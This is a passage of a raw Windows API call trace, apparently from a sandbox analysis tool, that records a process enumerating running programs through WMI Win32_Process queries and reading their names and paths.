wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27db7cc*=0, plFlavor=0x27db7d0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x27db7cc*=8, plFlavor=0x27db7d0*=0) returned 0x0 [0279.775] IWbemClassObject:Get (in: This=0x571cd10, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27db7cc*=8, plFlavor=0x27db7d0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x27db7cc*=8, plFlavor=0x27db7d0*=0) returned 0x0 [0279.775] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c538, puReturned=0x27bb39c | out: apObjects=0x571c538*=0x571cea8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.776] IMarshal:GetUnmarshalClass (in: This=0x571ceac, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.776] IUnknown:Release (This=0x571ceac) returned 0x3 [0279.777] IWbemClassObject:Get (in: This=0x571cea8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.777] IWbemClassObject:Get (in: This=0x571cea8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2736\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.777] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.777] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.777] IUnknown:Release (This=0x500344) returned 0x1 [0279.778] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c538) returned 0x0 [0279.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c538, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.778] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c538, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57197f8) returned 0x0 [0279.778] WbemDefPath:IUnknown:Release (This=0x571c538) returned 0x0 [0279.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57197f8) returned 0x0 [0279.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.779] WbemDefPath:IUnknown:AddRef (This=0x57197f8) returned 0x3 [0279.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x571c548) returned 0x0 [0279.779] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c548, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.779] WbemDefPath:IUnknown:Release (This=0x571c548) returned 0x3 [0279.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.780] WbemDefPath:IUnknown:Release (This=0x57197f8) returned 0x2 [0279.780] WbemDefPath:IUnknown:Release (This=0x57197f8) returned 0x1 [0279.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x57197f8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x57197f8) returned 0x0 [0279.780] WbemDefPath:IUnknown:AddRef (This=0x57197f8) returned 0x3 [0279.780] WbemDefPath:IUnknown:Release (This=0x57197f8) returned 0x2 [0279.780] WbemDefPath:IWbemPath:SetText (This=0x57197f8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2736\"") returned 0x0 [0279.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.780] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.780] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.780] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.781] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.781] IWbemClassObject:Get (in: This=0x571cea8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27dc05c*=0, plFlavor=0x27dc060*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x27dc05c*=8, plFlavor=0x27dc060*=0) returned 0x0 [0279.781] IWbemClassObject:Get (in: This=0x571cea8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27dc05c*=8, plFlavor=0x27dc060*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x27dc05c*=8, plFlavor=0x27dc060*=0) returned 0x0 [0279.781] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c578, puReturned=0x27bb39c | out: apObjects=0x571c578*=0x571d040, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.782] IMarshal:GetUnmarshalClass (in: This=0x571d044, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.782] IUnknown:Release (This=0x571d044) returned 0x3 [0279.783] IWbemClassObject:Get (in: This=0x571d040, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.784] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.784] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.784] IUnknown:Release (This=0x500344) returned 0x1 [0279.784] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c578) returned 0x0 [0279.785] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c578, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.785] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c578, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57198d8) returned 0x0 [0279.785] WbemDefPath:IUnknown:Release (This=0x571c578) returned 0x0 [0279.785] WbemDefPath:IUnknown:QueryInterface (in: This=0x57198d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x57198d8) returned 0x0 [0279.785] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c588, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.785] WbemDefPath:IUnknown:Release (This=0x571c588) returned 0x3 [0279.786] WbemDefPath:IWbemPath:SetText (This=0x57198d8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2768\"") returned 0x0 [0279.786] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.786] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.786] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.786] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c5b8, puReturned=0x27bb39c | out: apObjects=0x571c5b8*=0x571d1d8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.787] IMarshal:GetUnmarshalClass (in: This=0x571d1dc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.788] IUnknown:Release (This=0x571d1dc) returned 0x3 [0279.788] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.788] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.788] IUnknown:Release (This=0x500344) returned 0x1 [0279.789] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c5b8) returned 0x0 [0279.789] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c5b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.789] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c5b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x57199b8) returned 0x0 [0279.789] WbemDefPath:IUnknown:Release (This=0x571c5b8) returned 0x0 [0279.789] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c5c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.789] WbemDefPath:IUnknown:Release (This=0x571c5c8) returned 0x3 [0279.790] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c5f8, puReturned=0x27bb39c | out: apObjects=0x571c5f8*=0x571d370, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.791] IMarshal:GetUnmarshalClass (in: This=0x571d374, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.791] IUnknown:Release (This=0x571d374) returned 0x3 [0279.791] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.792] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.792] IUnknown:Release (This=0x500344) returned 0x1 [0279.792] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c5f8) returned 0x0 [0279.793] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c5f8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.793] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c5f8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719a98) returned 0x0 [0279.793] WbemDefPath:IUnknown:Release (This=0x571c5f8) returned 0x0 [0279.793] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c608, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.793] WbemDefPath:IUnknown:Release (This=0x571c608) returned 0x3 [0279.793] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c638, puReturned=0x27bb39c | out: apObjects=0x571c638*=0x571d508, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.794] IMarshal:GetUnmarshalClass (in: This=0x571d50c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.794] IUnknown:Release (This=0x571d50c) returned 0x3 [0279.795] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.795] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.795] IUnknown:Release (This=0x500344) returned 0x1 [0279.796] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c638) returned 0x0 [0279.796] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c638, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.796] WbemDefPath:IClassFactory:CreateInstance (in: This=0x571c638, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5719b78) returned 0x0 [0279.796] WbemDefPath:IUnknown:Release (This=0x571c638) returned 0x0 [0279.796] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x571c648, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.796] WbemDefPath:IUnknown:Release (This=0x571c648) returned 0x3 [0279.797] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x571c678, puReturned=0x27bb39c | out: apObjects=0x571c678*=0x571d6a0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.846] IMarshal:GetUnmarshalClass (in: This=0x571d6a4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.846] IUnknown:Release (This=0x571d6a4) returned 0x3 [0279.846] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.846] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.847] IUnknown:Release (This=0x500344) returned 0x1 [0279.847] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x571c678) returned 0x0 [0279.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x571c678, 